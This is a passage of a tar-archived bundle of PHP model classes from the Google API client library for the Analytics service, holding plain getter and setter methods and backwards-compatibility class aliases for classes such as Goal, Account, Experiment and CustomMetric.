google-api/vendor/google/apiclient-services/src/Analytics/McfDataRows.php000064400000003321147600400120022523 0ustar00conversionPathValue = $conversionPathValue; } /** * @return McfDataRowsConversionPathValue[] */ public function getConversionPathValue() { return $this->conversionPathValue; } /** * @param string */ public function setPrimitiveValue($primitiveValue) { $this->primitiveValue = $primitiveValue; } /** * @return string */ public function getPrimitiveValue() { return $this->primitiveValue; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(McfDataRows::class, 'Google_Service_Analytics_McfDataRows'); google-api/vendor/google/apiclient-services/src/Analytics/UnsampledReports.php000064400000006075147600400120023671 0ustar00items = $items; } /** * @return UnsampledReport[] */ public function getItems() { return $this->items; } /** * @param int */ public function setItemsPerPage($itemsPerPage) { $this->itemsPerPage = $itemsPerPage; } /** * @return int */ public function getItemsPerPage() { return $this->itemsPerPage; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param string */ public function setNextLink($nextLink) { $this->nextLink = $nextLink; } /** * @return string */ public function getNextLink() { return $this->nextLink; } /** * @param string */ public function setPreviousLink($previousLink) { $this->previousLink = $previousLink; } /** * @return string */ public function getPreviousLink() { return $this->previousLink; } /** * @param int */ public function setStartIndex($startIndex) { $this->startIndex = $startIndex; } /** * @return int */ public function getStartIndex() { return $this->startIndex; } /** * @param int */ public function setTotalResults($totalResults) { $this->totalResults = $totalResults; } /** * @return int */ public function getTotalResults() { return $this->totalResults; } /** * @param string */ public function setUsername($username) { $this->username = $username; } /** * @return string */ public function getUsername() { return $this->username; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(UnsampledReports::class, 'Google_Service_Analytics_UnsampledReports'); google-api/vendor/google/apiclient-services/src/Analytics/Goal.php000064400000015051147600400120021236 0ustar00accountId = $accountId; } /** * @return string */ public function getAccountId() { return $this->accountId; } /** * @param bool */ public function setActive($active) { $this->active = $active; } /** * @return bool */ public function getActive() { return $this->active; } /** * @param string */ public function setCreated($created) { $this->created = $created; } /** * @return string */ public function getCreated() { return $this->created; } /** * @param GoalEventDetails */ public function setEventDetails(GoalEventDetails $eventDetails) { $this->eventDetails = $eventDetails; } /** * @return GoalEventDetails */ public function getEventDetails() { return $this->eventDetails; } /** * @param string */ public function setId($id) { $this->id = $id; } /** * @return string */ public function getId() { return $this->id; } /** * @param string */ public function setInternalWebPropertyId($internalWebPropertyId) { $this->internalWebPropertyId = $internalWebPropertyId; } /** * @return string */ public function getInternalWebPropertyId() { return $this->internalWebPropertyId; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param GoalParentLink */ public function setParentLink(GoalParentLink $parentLink) { $this->parentLink = $parentLink; } /** * @return GoalParentLink */ public function getParentLink() { return $this->parentLink; } /** * @param string */ public function setProfileId($profileId) { $this->profileId = $profileId; } /** * @return string */ public function getProfileId() { return $this->profileId; } /** * @param string */ public function setSelfLink($selfLink) { $this->selfLink = $selfLink; } /** * @return string */ public function getSelfLink() { return $this->selfLink; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } /** * @param string */ public function setUpdated($updated) { $this->updated = $updated; } /** * @return string */ public function getUpdated() { return $this->updated; } /** * @param GoalUrlDestinationDetails */ public function setUrlDestinationDetails(GoalUrlDestinationDetails $urlDestinationDetails) { $this->urlDestinationDetails = $urlDestinationDetails; } /** * @return GoalUrlDestinationDetails */ public function getUrlDestinationDetails() { return $this->urlDestinationDetails; } /** * @param float */ public function setValue($value) { $this->value = $value; } /** * @return float */ public function getValue() { return $this->value; } /** * @param GoalVisitNumPagesDetails */ public function setVisitNumPagesDetails(GoalVisitNumPagesDetails $visitNumPagesDetails) { $this->visitNumPagesDetails = $visitNumPagesDetails; } /** * @return GoalVisitNumPagesDetails */ public function getVisitNumPagesDetails() { return $this->visitNumPagesDetails; } /** * @param GoalVisitTimeOnSiteDetails */ public function setVisitTimeOnSiteDetails(GoalVisitTimeOnSiteDetails $visitTimeOnSiteDetails) { $this->visitTimeOnSiteDetails = $visitTimeOnSiteDetails; } /** * @return GoalVisitTimeOnSiteDetails */ public function getVisitTimeOnSiteDetails() { return $this->visitTimeOnSiteDetails; } /** * @param string */ public function setWebPropertyId($webPropertyId) { $this->webPropertyId = $webPropertyId; } /** * @return string */ public function getWebPropertyId() { return $this->webPropertyId; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Goal::class, 'Google_Service_Analytics_Goal'); google-api/vendor/google/apiclient-services/src/Analytics/McfDataColumnHeaders.php000064400000003143147600400120024324 0ustar00columnType = $columnType; } /** * @return string */ public function getColumnType() { return $this->columnType; } /** * @param string */ public function setDataType($dataType) { $this->dataType = $dataType; } /** * @return string */ public function getDataType() { return $this->dataType; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(McfDataColumnHeaders::class, 'Google_Service_Analytics_McfDataColumnHeaders'); google-api/vendor/google/apiclient-services/src/Analytics/Column.php000064400000003025147600400120021607 0ustar00attributes = $attributes; } /** * @return string[] */ public function getAttributes() { return $this->attributes; } /** * @param string */ public function setId($id) { $this->id = $id; } /** * @return string */ public function getId() { return $this->id; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Column::class, 'Google_Service_Analytics_Column'); google-api/vendor/google/apiclient-services/src/Analytics/McfDataQuery.php000064400000007550147600400120022706 0ustar00 "end-date", "maxResults" => "max-results", "startDate" => "start-date", "startIndex" => "start-index", ]; /** * @var string */ public $dimensions; /** * @var string */ public $endDate; /** * @var string */ public $filters; /** * @var string */ public $ids; /** * @var int */ public $maxResults; /** * @var string[] */ public $metrics; /** * @var string */ public $samplingLevel; /** * @var string */ public $segment; /** * @var string[] */ public $sort; /** * @var string */ public $startDate; /** * @var int */ public $startIndex; /** * @param string */ public function setDimensions($dimensions) { $this->dimensions = $dimensions; } /** * @return string */ public function getDimensions() { return $this->dimensions; } /** * @param string */ public function setEndDate($endDate) { $this->endDate = $endDate; } /** * @return string */ public function getEndDate() { return $this->endDate; } /** * @param string */ public function setFilters($filters) { $this->filters = $filters; } /** * @return string */ public function getFilters() { return $this->filters; } /** * @param string */ public function setIds($ids) { $this->ids = $ids; } /** * @return string */ public function getIds() { return $this->ids; } /** * @param int */ public function setMaxResults($maxResults) { $this->maxResults = $maxResults; } /** * @return int */ public function getMaxResults() { return $this->maxResults; } /** * @param string[] */ public function setMetrics($metrics) { $this->metrics = $metrics; } /** * @return string[] */ public function getMetrics() { return $this->metrics; } /** * @param string */ public function setSamplingLevel($samplingLevel) { $this->samplingLevel = $samplingLevel; } /** * @return string */ public function getSamplingLevel() { return $this->samplingLevel; } /** * @param string */ public function setSegment($segment) { $this->segment = $segment; } /** * @return string */ public function getSegment() { return $this->segment; } /** * @param string[] */ public function setSort($sort) { $this->sort = $sort; } /** * @return string[] */ public function getSort() { return $this->sort; } /** * @param string */ public function setStartDate($startDate) { $this->startDate = $startDate; } /** * @return string */ public function getStartDate() { return $this->startDate; } /** * @param int */ public function setStartIndex($startIndex) { $this->startIndex = $startIndex; } /** * @return int */ public function getStartIndex() { return $this->startIndex; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(McfDataQuery::class, 'Google_Service_Analytics_McfDataQuery'); google-api/vendor/google/apiclient-services/src/Analytics/FilterSearchAndReplaceDetails.php000064400000004344147600400120026157 0ustar00caseSensitive = $caseSensitive; } /** * @return bool */ public function getCaseSensitive() { return $this->caseSensitive; } /** * @param string */ public function setField($field) { $this->field = $field; } /** * @return string */ public function getField() { return $this->field; } /** * @param int */ public function setFieldIndex($fieldIndex) { $this->fieldIndex = $fieldIndex; } /** * @return int */ public function getFieldIndex() { return $this->fieldIndex; } /** * @param string */ public function setReplaceString($replaceString) { $this->replaceString = $replaceString; } /** * @return string */ public function getReplaceString() { return $this->replaceString; } /** * @param string */ public function setSearchString($searchString) { $this->searchString = $searchString; } /** * @return string */ public function getSearchString() { return $this->searchString; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(FilterSearchAndReplaceDetails::class, 'Google_Service_Analytics_FilterSearchAndReplaceDetails'); google-api/vendor/google/apiclient-services/src/Analytics/Account.php000064400000006457147600400120021762 0ustar00childLink = $childLink; } /** * @return AccountChildLink */ public function getChildLink() { return $this->childLink; } /** * @param string */ public function setCreated($created) { $this->created = $created; } /** * @return string */ public function getCreated() { return $this->created; } /** * @param string */ public function setId($id) { $this->id = $id; } /** * @return string */ public function getId() { return $this->id; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param AccountPermissions */ public function setPermissions(AccountPermissions $permissions) { $this->permissions = $permissions; } /** * @return AccountPermissions */ public function getPermissions() { return $this->permissions; } /** * @param string */ public function setSelfLink($selfLink) { $this->selfLink = $selfLink; } /** * @return string */ public function getSelfLink() { return $this->selfLink; } /** * @param bool */ public function setStarred($starred) { $this->starred = $starred; } /** * @return bool */ public function getStarred() { return $this->starred; } /** * @param string */ public function setUpdated($updated) { $this->updated = $updated; } /** * @return string */ public function getUpdated() { return $this->updated; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Account::class, 'Google_Service_Analytics_Account'); google-api/vendor/google/apiclient-services/src/Analytics/ProfileRef.php000064400000005162147600400120022413 0ustar00accountId = $accountId; } /** * @return string */ public function getAccountId() { return $this->accountId; } /** * @param string */ public function setHref($href) { $this->href = $href; } /** * @return string */ public function getHref() { return $this->href; } /** * @param string */ public function setId($id) { $this->id = $id; } /** * @return string */ public function getId() { return $this->id; } /** * @param string */ public function setInternalWebPropertyId($internalWebPropertyId) { $this->internalWebPropertyId = $internalWebPropertyId; } /** * @return string */ public function getInternalWebPropertyId() { return $this->internalWebPropertyId; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setWebPropertyId($webPropertyId) { $this->webPropertyId = $webPropertyId; } /** * @return string */ public function getWebPropertyId() { return $this->webPropertyId; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ProfileRef::class, 'Google_Service_Analytics_ProfileRef'); google-api/vendor/google/apiclient-services/src/Analytics/AdWordsAccount.php000064400000003221147600400120023230 0ustar00autoTaggingEnabled = $autoTaggingEnabled; } /** * @return bool */ public function getAutoTaggingEnabled() { return $this->autoTaggingEnabled; } /** * @param string */ public function setCustomerId($customerId) { $this->customerId = $customerId; } /** * @return string */ public function getCustomerId() { return $this->customerId; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(AdWordsAccount::class, 'Google_Service_Analytics_AdWordsAccount'); google-api/vendor/google/apiclient-services/src/Analytics/UserDeletionRequest.php000064400000005214147600400120024327 0ustar00deletionRequestTime = $deletionRequestTime; } /** * @return string */ public function getDeletionRequestTime() { return $this->deletionRequestTime; } /** * @param string */ public function setFirebaseProjectId($firebaseProjectId) { $this->firebaseProjectId = $firebaseProjectId; } /** * @return string */ public function getFirebaseProjectId() { return $this->firebaseProjectId; } /** * @param UserDeletionRequestId */ public function setId(UserDeletionRequestId $id) { $this->id = $id; } /** * @return UserDeletionRequestId */ public function getId() { return $this->id; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param string */ public function setPropertyId($propertyId) { $this->propertyId = $propertyId; } /** * @return string */ public function getPropertyId() { return $this->propertyId; } /** * @param string */ public function setWebPropertyId($webPropertyId) { $this->webPropertyId = $webPropertyId; } /** * @return string */ public function getWebPropertyId() { return $this->webPropertyId; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(UserDeletionRequest::class, 'Google_Service_Analytics_UserDeletionRequest'); google-api/vendor/google/apiclient-services/src/Analytics/WebpropertyPermissions.php000064400000002250147600400120025127 0ustar00effective = $effective; } /** * @return string[] */ public function getEffective() { return $this->effective; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(WebpropertyPermissions::class, 'Google_Service_Analytics_WebpropertyPermissions'); google-api/vendor/google/apiclient-services/src/Analytics/GaDataDataTableRowsC.php000064400000002064147600400120024215 0ustar00v = $v; } /** * @return string */ public function getV() { return $this->v; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(GaDataDataTableRowsC::class, 'Google_Service_Analytics_GaDataDataTableRowsC'); google-api/vendor/google/apiclient-services/src/Analytics/CustomDimensionParentLink.php000064400000002502147600400120025461 0ustar00href = $href; } /** * @return string */ public function getHref() { return $this->href; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(CustomDimensionParentLink::class, 'Google_Service_Analytics_CustomDimensionParentLink'); google-api/vendor/google/apiclient-services/src/Analytics/IncludeConditions.php000064400000004332147600400120023771 0ustar00daysToLookBack = $daysToLookBack; } /** * @return int */ public function getDaysToLookBack() { return $this->daysToLookBack; } /** * @param bool */ public function setIsSmartList($isSmartList) { $this->isSmartList = $isSmartList; } /** * @return bool */ public function getIsSmartList() { return $this->isSmartList; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param int */ public function setMembershipDurationDays($membershipDurationDays) { $this->membershipDurationDays = $membershipDurationDays; } /** * @return int */ public function getMembershipDurationDays() { return $this->membershipDurationDays; } /** * @param string */ public function setSegment($segment) { $this->segment = $segment; } /** * @return string */ public function getSegment() { return $this->segment; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(IncludeConditions::class, 'Google_Service_Analytics_IncludeConditions'); google-api/vendor/google/apiclient-services/src/Analytics/AccountSummary.php000064400000004347147600400120023334 0ustar00id = $id; } /** * @return string */ public function getId() { return $this->id; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param bool */ public function setStarred($starred) { $this->starred = $starred; } /** * @return bool */ public function getStarred() { return $this->starred; } /** * @param WebPropertySummary[] */ public function setWebProperties($webProperties) { $this->webProperties = $webProperties; } /** * @return WebPropertySummary[] */ public function getWebProperties() { return $this->webProperties; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(AccountSummary::class, 'Google_Service_Analytics_AccountSummary'); google-api/vendor/google/apiclient-services/src/Analytics/GaDataDataTable.php000064400000003133147600400120023235 0ustar00cols = $cols; } /** * @return GaDataDataTableCols[] */ public function getCols() { return $this->cols; } /** * @param GaDataDataTableRows[] */ public function setRows($rows) { $this->rows = $rows; } /** * @return GaDataDataTableRows[] */ public function getRows() { return $this->rows; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(GaDataDataTable::class, 'Google_Service_Analytics_GaDataDataTable'); google-api/vendor/google/apiclient-services/src/Analytics/GoalVisitTimeOnSiteDetails.php000064400000002730147600400120025524 0ustar00comparisonType = $comparisonType; } /** * @return string */ public function getComparisonType() { return $this->comparisonType; } /** * @param string */ public function setComparisonValue($comparisonValue) { $this->comparisonValue = $comparisonValue; } /** * @return string */ public function getComparisonValue() { return $this->comparisonValue; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(GoalVisitTimeOnSiteDetails::class, 'Google_Service_Analytics_GoalVisitTimeOnSiteDetails'); google-api/vendor/google/apiclient-services/src/Analytics/GaDataProfileInfo.php000064400000005024147600400120023631 0ustar00accountId = $accountId; } /** * @return string */ public function getAccountId() { return $this->accountId; } /** * @param string */ public function setInternalWebPropertyId($internalWebPropertyId) { $this->internalWebPropertyId = $internalWebPropertyId; } /** * @return string */ public function getInternalWebPropertyId() { return $this->internalWebPropertyId; } /** * @param string */ public function setProfileId($profileId) { $this->profileId = $profileId; } /** * @return string */ public function getProfileId() { return $this->profileId; } /** * @param string */ public function setProfileName($profileName) { $this->profileName = $profileName; } /** * @return string */ public function getProfileName() { return $this->profileName; } /** * @param string */ public function setTableId($tableId) { $this->tableId = $tableId; } /** * @return string */ public function getTableId() { return $this->tableId; } /** * @param string */ public function setWebPropertyId($webPropertyId) { $this->webPropertyId = $webPropertyId; } /** * @return string */ public function getWebPropertyId() { return $this->webPropertyId; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(GaDataProfileInfo::class, 'Google_Service_Analytics_GaDataProfileInfo'); google-api/vendor/google/apiclient-services/src/Analytics/GoalEventDetails.php000064400000003257147600400120023553 0ustar00eventConditions = $eventConditions; } /** * @return GoalEventDetailsEventConditions[] */ public function getEventConditions() { return $this->eventConditions; } /** * @param bool */ public function setUseEventValue($useEventValue) { $this->useEventValue = $useEventValue; } /** * @return bool */ public function getUseEventValue() { return $this->useEventValue; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(GoalEventDetails::class, 'Google_Service_Analytics_GoalEventDetails'); google-api/vendor/google/apiclient-services/src/Analytics/AccountRef.php000064400000003333147600400120022405 0ustar00href = $href; } /** * @return string */ public function getHref() { return $this->href; } /** * @param string */ public function setId($id) { $this->id = $id; } /** * @return string */ public function getId() { return $this->id; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(AccountRef::class, 'Google_Service_Analytics_AccountRef'); google-api/vendor/google/apiclient-services/src/Analytics/RemarketingAudience.php000064400000013077147600400120024270 0ustar00accountId = $accountId; } /** * @return string */ public function getAccountId() { return $this->accountId; } /** * @param RemarketingAudienceAudienceDefinition */ public function setAudienceDefinition(RemarketingAudienceAudienceDefinition $audienceDefinition) { $this->audienceDefinition = $audienceDefinition; } /** * @return RemarketingAudienceAudienceDefinition */ public function getAudienceDefinition() { return $this->audienceDefinition; } /** * @param string */ public function setAudienceType($audienceType) { $this->audienceType = $audienceType; } /** * @return string */ public function getAudienceType() { return $this->audienceType; } /** * @param string */ public function setCreated($created) { $this->created = $created; } /** * @return string */ public function getCreated() { return $this->created; } /** * @param string */ public function setDescription($description) { $this->description = $description; } /** * @return string */ public function getDescription() { return $this->description; } /** * @param string */ public function setId($id) { $this->id = $id; } /** * @return string */ public function getId() { return $this->id; } /** * @param string */ public function setInternalWebPropertyId($internalWebPropertyId) { $this->internalWebPropertyId = $internalWebPropertyId; } /** * @return string */ public function getInternalWebPropertyId() { return $this->internalWebPropertyId; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param LinkedForeignAccount[] */ public function setLinkedAdAccounts($linkedAdAccounts) { $this->linkedAdAccounts = $linkedAdAccounts; } /** * @return LinkedForeignAccount[] */ public function getLinkedAdAccounts() { return $this->linkedAdAccounts; } /** * @param string[] */ public function setLinkedViews($linkedViews) { $this->linkedViews = $linkedViews; } /** * @return string[] */ public function getLinkedViews() { return $this->linkedViews; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param RemarketingAudienceStateBasedAudienceDefinition */ public function setStateBasedAudienceDefinition(RemarketingAudienceStateBasedAudienceDefinition $stateBasedAudienceDefinition) { $this->stateBasedAudienceDefinition = $stateBasedAudienceDefinition; } /** * @return RemarketingAudienceStateBasedAudienceDefinition */ public function getStateBasedAudienceDefinition() { return $this->stateBasedAudienceDefinition; } /** * @param string */ public function setUpdated($updated) { $this->updated = $updated; } /** * @return string */ public function getUpdated() { return $this->updated; } /** * @param string */ public function setWebPropertyId($webPropertyId) { $this->webPropertyId = $webPropertyId; } /** * @return string */ public function getWebPropertyId() { return $this->webPropertyId; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(RemarketingAudience::class, 'Google_Service_Analytics_RemarketingAudience'); google-api/vendor/google/apiclient-services/src/Analytics/Columns.php000064400000004314147600400120021774 0ustar00attributeNames = $attributeNames; } /** * @return string[] */ public function getAttributeNames() { return $this->attributeNames; } /** * @param string */ public function setEtag($etag) { $this->etag = $etag; } /** * @return string */ public function getEtag() { return $this->etag; } /** * @param Column[] */ public function setItems($items) { $this->items = $items; } /** * @return Column[] */ public function getItems() { return $this->items; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param int */ public function setTotalResults($totalResults) { $this->totalResults = $totalResults; } /** * @return int */ public function getTotalResults() { return $this->totalResults; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Columns::class, 'Google_Service_Analytics_Columns'); google-api/vendor/google/apiclient-services/src/Analytics/Experiment.php000064400000021715147600400120022500 0ustar00accountId = $accountId; } /** * @return string */ public function getAccountId() { return $this->accountId; } /** * @param string */ public function setCreated($created) { $this->created = $created; } /** * @return string */ public function getCreated() { return $this->created; } /** * @param string */ public function setDescription($description) { $this->description = $description; } /** * @return string */ public function getDescription() { return $this->description; } /** * @param bool */ public function setEditableInGaUi($editableInGaUi) { $this->editableInGaUi = $editableInGaUi; } /** * @return bool */ public function getEditableInGaUi() { return $this->editableInGaUi; } /** * @param string */ public function setEndTime($endTime) { $this->endTime = $endTime; } /** * @return string */ public function getEndTime() { return $this->endTime; } /** * @param bool */ public function setEqualWeighting($equalWeighting) { $this->equalWeighting = $equalWeighting; } /** * @return bool */ public function getEqualWeighting() { return $this->equalWeighting; } /** * @param string */ public function setId($id) { $this->id = $id; } /** * @return string */ public function getId() { return $this->id; } /** * @param string */ public function setInternalWebPropertyId($internalWebPropertyId) { $this->internalWebPropertyId = $internalWebPropertyId; } /** * @return string */ public function getInternalWebPropertyId() { return $this->internalWebPropertyId; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param int */ public function setMinimumExperimentLengthInDays($minimumExperimentLengthInDays) { $this->minimumExperimentLengthInDays = $minimumExperimentLengthInDays; } /** * @return int */ public function getMinimumExperimentLengthInDays() { return $this->minimumExperimentLengthInDays; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setObjectiveMetric($objectiveMetric) { $this->objectiveMetric = $objectiveMetric; } /** * @return string */ public function getObjectiveMetric() { return $this->objectiveMetric; } /** * @param string */ public function setOptimizationType($optimizationType) { $this->optimizationType = $optimizationType; } /** * @return string */ public function getOptimizationType() { return $this->optimizationType; } /** * @param ExperimentParentLink */ public function setParentLink(ExperimentParentLink $parentLink) { $this->parentLink = $parentLink; } /** * @return ExperimentParentLink */ public function getParentLink() { return $this->parentLink; } /** * @param string */ public function setProfileId($profileId) { $this->profileId = $profileId; } /** * @return string */ public function getProfileId() { return $this->profileId; } /** * @param string */ public function setReasonExperimentEnded($reasonExperimentEnded) { $this->reasonExperimentEnded = $reasonExperimentEnded; } /** * @return string */ public function getReasonExperimentEnded() { return $this->reasonExperimentEnded; } /** * @param bool */ public function setRewriteVariationUrlsAsOriginal($rewriteVariationUrlsAsOriginal) { $this->rewriteVariationUrlsAsOriginal = $rewriteVariationUrlsAsOriginal; } /** * @return bool */ public function getRewriteVariationUrlsAsOriginal() { return $this->rewriteVariationUrlsAsOriginal; } /** * @param string */ public function setSelfLink($selfLink) { $this->selfLink = $selfLink; } /** * @return string */ public function getSelfLink() { return $this->selfLink; } /** * @param string */ public function setServingFramework($servingFramework) { $this->servingFramework = $servingFramework; } /** * @return string */ public function getServingFramework() { return $this->servingFramework; } /** * @param string */ public function setSnippet($snippet) { $this->snippet = $snippet; } /** * @return string */ public function getSnippet() { return $this->snippet; } /** * @param string */ public function setStartTime($startTime) { $this->startTime = $startTime; } /** * @return string */ public function getStartTime() { return $this->startTime; } /** * @param string */ public function setStatus($status) { $this->status = $status; } /** * @return string */ public function getStatus() { return $this->status; } public function setTrafficCoverage($trafficCoverage) { $this->trafficCoverage = $trafficCoverage; } public function getTrafficCoverage() { return $this->trafficCoverage; } /** * @param string */ public function setUpdated($updated) { $this->updated = $updated; } /** * @return string */ public function getUpdated() { return $this->updated; } /** * @param ExperimentVariations[] */ public function setVariations($variations) { $this->variations = $variations; } /** * @return ExperimentVariations[] */ public function getVariations() { return $this->variations; } /** * @param string */ public function setWebPropertyId($webPropertyId) { $this->webPropertyId = $webPropertyId; } /** * @return string */ public function getWebPropertyId() { return $this->webPropertyId; } public function setWinnerConfidenceLevel($winnerConfidenceLevel) { $this->winnerConfidenceLevel = $winnerConfidenceLevel; } public function getWinnerConfidenceLevel() { return $this->winnerConfidenceLevel; } /** * @param bool */ public function setWinnerFound($winnerFound) { $this->winnerFound = $winnerFound; } /** * @return bool */ public function getWinnerFound() { return $this->winnerFound; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Experiment::class, 'Google_Service_Analytics_Experiment'); google-api/vendor/google/apiclient-services/src/Analytics/GoalEventDetailsEventConditions.php000064400000004362147600400120026605 0ustar00comparisonType = $comparisonType; } /** * @return string */ public function getComparisonType() { return $this->comparisonType; } /** * @param string */ public function setComparisonValue($comparisonValue) { $this->comparisonValue = $comparisonValue; } /** * @return string */ public function getComparisonValue() { return $this->comparisonValue; } /** * @param string */ public function setExpression($expression) { $this->expression = $expression; } /** * @return string */ public function getExpression() { return $this->expression; } /** * @param string */ public function setMatchType($matchType) { $this->matchType = $matchType; } /** * @return string */ public function getMatchType() { return $this->matchType; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(GoalEventDetailsEventConditions::class, 'Google_Service_Analytics_GoalEventDetailsEventConditions'); google-api/vendor/google/apiclient-services/src/Analytics/FilterAdvancedDetails.php000064400000010767147600400120024546 0ustar00caseSensitive = $caseSensitive; } /** * @return bool */ public function getCaseSensitive() { return $this->caseSensitive; } /** * @param string */ public function setExtractA($extractA) { $this->extractA = $extractA; } /** * @return string */ public function getExtractA() { return $this->extractA; } /** * @param string */ public function setExtractB($extractB) { $this->extractB = $extractB; } /** * @return string */ public function getExtractB() { return $this->extractB; } /** * @param string */ public function setFieldA($fieldA) { $this->fieldA = $fieldA; } /** * @return string */ public function getFieldA() { return $this->fieldA; } /** * @param int */ public function setFieldAIndex($fieldAIndex) { $this->fieldAIndex = $fieldAIndex; } /** * @return int */ public function getFieldAIndex() { return $this->fieldAIndex; } /** * @param bool */ public function setFieldARequired($fieldARequired) { $this->fieldARequired = $fieldARequired; } /** * @return bool */ public function getFieldARequired() { return $this->fieldARequired; } /** * @param string */ public function setFieldB($fieldB) { $this->fieldB = $fieldB; } /** * @return string */ public function getFieldB() { return $this->fieldB; } /** * @param int */ public function setFieldBIndex($fieldBIndex) { $this->fieldBIndex = $fieldBIndex; } /** * @return int */ public function getFieldBIndex() { return $this->fieldBIndex; } /** * @param bool */ public function setFieldBRequired($fieldBRequired) { $this->fieldBRequired = $fieldBRequired; } /** * @return bool */ public function getFieldBRequired() { return $this->fieldBRequired; } /** * @param string */ public function setOutputConstructor($outputConstructor) { $this->outputConstructor = $outputConstructor; } /** * @return string */ public function getOutputConstructor() { return $this->outputConstructor; } /** * @param string */ public function setOutputToField($outputToField) { $this->outputToField = $outputToField; } /** * @return string */ public function getOutputToField() { return $this->outputToField; } /** * @param int */ public function setOutputToFieldIndex($outputToFieldIndex) { $this->outputToFieldIndex = $outputToFieldIndex; } /** * @return int */ public function getOutputToFieldIndex() { return $this->outputToFieldIndex; } /** * @param bool */ public function setOverrideOutputField($overrideOutputField) { $this->overrideOutputField = $overrideOutputField; } /** * @return bool */ public function getOverrideOutputField() { return $this->overrideOutputField; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(FilterAdvancedDetails::class, 'Google_Service_Analytics_FilterAdvancedDetails'); google-api/vendor/google/apiclient-services/src/Analytics/CustomDataSourceChildLink.php000064400000002502147600400120025360 0ustar00href = $href; } /** * @return string */ public function getHref() { return $this->href; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(CustomDataSourceChildLink::class, 'Google_Service_Analytics_CustomDataSourceChildLink'); vendor/google/apiclient-services/src/Analytics/RemarketingAudienceStateBasedAudienceDefinition.php000064400000004143147600400120031612 0ustar00google-apiexcludeConditions = $excludeConditions; } /** * @return RemarketingAudienceStateBasedAudienceDefinitionExcludeConditions */ public function getExcludeConditions() { return $this->excludeConditions; } /** * @param IncludeConditions */ public function setIncludeConditions(IncludeConditions $includeConditions) { $this->includeConditions = $includeConditions; } /** * @return IncludeConditions */ public function getIncludeConditions() { return $this->includeConditions; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(RemarketingAudienceStateBasedAudienceDefinition::class, 'Google_Service_Analytics_RemarketingAudienceStateBasedAudienceDefinition'); google-api/vendor/google/apiclient-services/src/Analytics/CustomMetric.php000064400000011443147600400120022773 0ustar00 "max_value", "minValue" => "min_value", ]; /** * @var string */ public $accountId; /** * @var bool */ public $active; /** * @var string */ public $created; /** * @var string */ public $id; /** * @var int */ public $index; /** * @var string */ public $kind; /** * @var string */ public $maxValue; /** * @var string */ public $minValue; /** * @var string */ public $name; /** * @var CustomMetricParentLink */ public $parentLink; protected $parentLinkType = CustomMetricParentLink::class; protected $parentLinkDataType = ''; /** * @var string */ public $scope; /** * @var string */ public $selfLink; /** * @var string */ public $type; /** * 